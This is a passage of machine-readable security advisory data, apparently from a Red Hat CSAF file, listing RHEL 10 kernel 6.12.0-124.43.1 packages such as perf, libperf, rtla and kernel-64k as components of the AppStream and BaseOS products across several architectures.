"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "rv-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.src as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.src",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:6.12.0-124.43.1.el10_1.x86_64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64"
},
"product_reference": "kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch"
},
"product_reference": "kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64 as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x as a component of Red Hat Enterprise Linux BaseOS (v. 10)",
"product_id": "BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x"
},
"product_reference": "kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"relates_to_product_reference": "BaseOS-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
